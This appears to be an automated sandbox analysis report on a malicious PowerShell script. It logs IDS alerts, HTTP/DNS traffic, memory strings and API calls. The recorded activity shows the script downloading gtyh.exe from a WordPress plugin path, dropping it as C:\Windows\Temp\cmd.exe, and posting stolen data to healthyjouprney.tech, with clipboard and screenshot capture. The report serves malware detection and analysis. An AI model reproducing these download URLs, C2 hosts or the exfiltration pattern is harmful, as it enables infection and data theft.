Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49700 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49749 -> 91.206.178.120:5001
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49749 -> 91.206.178.120:5001
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49976 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49975 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49978 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49977 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49974 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49979 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49981 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49980 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49702 -> 35.208.212.94:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 35.208.212.94:443 -> 192.168.2.7:49702

Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/newsletter/images/gtyh.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sandramosquedamx.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: healthyjouprney.tech
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 43Host: healthyjouprney.tech
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=01FJ31T2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12781Host: healthyjouprney.tech
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9G2XNXJYM5N6UYFDCZ8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 6706Host: healthyjouprney.tech
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J7HJI078QZXHSCSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20380Host: healthyjouprney.tech
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ST6O9P6BQCQO1GKKVAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2226Host: healthyjouprney.tech
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HM9RDGEJ8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 385775Host: healthyjouprney.tech
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: healthyjouprney.tech
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script_end?random_number=29634 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001

Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/newsletter/images/gtyh.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sandramosquedamx.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script_end?random_number=29634 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: sandramosquedamx.com
Source: global traffic	DNS traffic detected: DNS query: healthyjouprney.tech

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: healthyjouprney.tech

Source: powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
Source: notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, get_txt.ps1	String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
Source: powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=29634
Source: powershell.exe, 00000000.00000002.1405953720.0000000004932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=29634$M
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_start?ip=
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497081959.000000FDFB8A9000.00000004.00000010.00020000.00000000.sdmp, get_txt.ps1	String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497081959.000000FDFB8A9000.00000004.00000010.00020000.00000000.sdmp, get_txt.ps1	String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000000.00000002.1425682486.0000000007BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1405953720.0000000004681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://x1.c.lencr.org/0
Source: cmd.exe, 0000000A.00000003.2027277755.0000000003793000.00000004.00000800.00020000.00000000.sdmp, 246DBF78426540B7.dat.10.dr	String found in binary or memory: http://x1.i.lencr.org/0
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000000.00000002.1405953720.0000000004681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2025610040.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043885038.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2041606518.0000000000C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/A
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2066952978.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2089874877.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074794526.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043952153.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/api
Source: cmd.exe, 0000000A.00000002.2102253733.0000000000C23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/api0
Source: cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000002.2102253733.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/apiF
Source: cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/apig
Source: cmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2043952153.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/apiied
Source: cmd.exe, 0000000A.00000003.2055561473.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2066952978.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/apimeP
Source: cmd.exe, 0000000A.00000003.2090430093.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2074333275.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech/apior
Source: cmd.exe, 0000000A.00000003.2074794526.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://healthyjouprney.tech:443/api
Source: cmd.exe, 0000000A.00000003.2030516949.0000000003761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: powershell.exe, 00000000.00000002.1410768611.00000000056E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1405953720.0000000004918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sandramosquedamx.com
Source: powershell.exe, 00000000.00000002.1405953720.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2497359062.00000279DD3D7000.00000004.00000020.00020000.00000000.sdmp, get_txt.ps1	String found in binary or memory: https://sandramosquedamx.com/wp-content/plugins/newsletter/images/gtyh.exe
Source: B36A69092427CC90.dat.10.dr	String found in binary or memory: https://support.mozilla.org
Source: B36A69092427CC90.dat.10.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: cmd.exe, 0000000A.00000003.2030074239.0000000003883000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: B36A69092427CC90.dat.10.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937807282.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cmd.exe, 0000000A.00000003.1937128777.00000000037A8000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1937603051.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, DC80069997623918.dat.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: B36A69092427CC90.dat.10.dr	String found in binary or memory: https://www.mozilla.org
Source: B36A69092427CC90.dat.10.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: B36A69092427CC90.dat.10.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: cmd.exe, 0000000A.00000003.2030074239.0000000003883000.00000004.00000800.00020000.00000000.sdmp, B36A69092427CC90.dat.10.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: B36A69092427CC90.dat.10.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: cmd.exe, 0000000A.00000003.2030074239.0000000003883000.00000004.00000800.00020000.00000000.sdmp, B36A69092427CC90.dat.10.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976

Source: unknown	HTTPS traffic detected: 35.208.212.94:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49981 version: TLS 1.2

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_0043B2B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

10_2_0043B2B0

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_0043B2B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

10_2_0043B2B0

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_0043B460 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

10_2_0043B460

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\cmd.exe

Jump to dropped file

Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02653BAE NtWriteVirtualMemory,NtWriteVirtualMemory,		10_2_02653BAE
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02653B9C NtWriteVirtualMemory,NtWriteVirtualMemory,		10_2_02653B9C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_045CE462	0_2_045CE462
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00419070	10_2_00419070
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00448360	10_2_00448360
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042C4A0	10_2_0042C4A0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00433745	10_2_00433745
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042977A	10_2_0042977A
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00447730	10_2_00447730
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_004407C0	10_2_004407C0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_004197EB	10_2_004197EB
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0040BBA0	10_2_0040BBA0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00412C13	10_2_00412C13
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00414D2B	10_2_00414D2B
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00425EB0	10_2_00425EB0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00419FF3	10_2_00419FF3
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00401040	10_2_00401040
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0043B040	10_2_0043B040
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_004280F4	10_2_004280F4
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00441080	10_2_00441080
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041209E	10_2_0041209E
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0043F0A5	10_2_0043F0A5
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00435130	10_2_00435130
